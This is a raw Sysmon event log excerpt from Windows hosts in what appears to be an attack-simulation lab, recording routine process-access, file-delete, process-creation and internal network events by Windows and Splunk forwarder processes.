+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e 10341000x8000000000000000285828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.094{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.094{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.063{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.063{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.057{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.057{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 23542300x8000000000000000214892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:46.617{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0025CE4272960B53FA22435D833DDFCA,SHA256=D0C059A818A67FCE3B92F1F66F07A43C2DFF1EE75695AB1ADE5154DBBAA462CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:46.891{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\YKXF6S3A\views[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:46.328{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEC33A10563DE0621C826F647624712,SHA256=1F555499DFC2264D742F868E159D67472C41C83C01DFBA6AD7561A0458A53A5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:46.195{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED80BABF7349630E22B960E0D8B86F69,SHA256=B0C69DFFC91C5BADE442EA2F1770804291E163B82657E8D5F5EF3546403B0939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:46.195{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8F045894E3A428315C033123E55154A,SHA256=6935A14E6DA5337513D42A83BE8427A83FB70BD08AD19B5EA0E7433BC8E39FAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F2F-6216-1404-000000003902}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0F2F-6216-1404-000000003902}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.961{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F2F-6216-1404-000000003902}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.962{4F8D34B0-0F2F-6216-1404-000000003902}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.774{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4D288AB5DDEF9162AD57C4D75463BB6,SHA256=EC85C43E5DE7C69AF336FE1F2900E0D9F0C0BBAA6483C2A69078E8AF25897A88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:47.331{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86919392A611EF84CA4B59C84DA2E361,SHA256=ECD413DF86BC643BD4F1FC70C05ED319CC3B17B114C2B92FDCBBB05088DD422E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:47.743{4F8D34B0-0F2F-6216-1304-000000003902}12402052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.197{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51221-false10.0.1.12-8089- 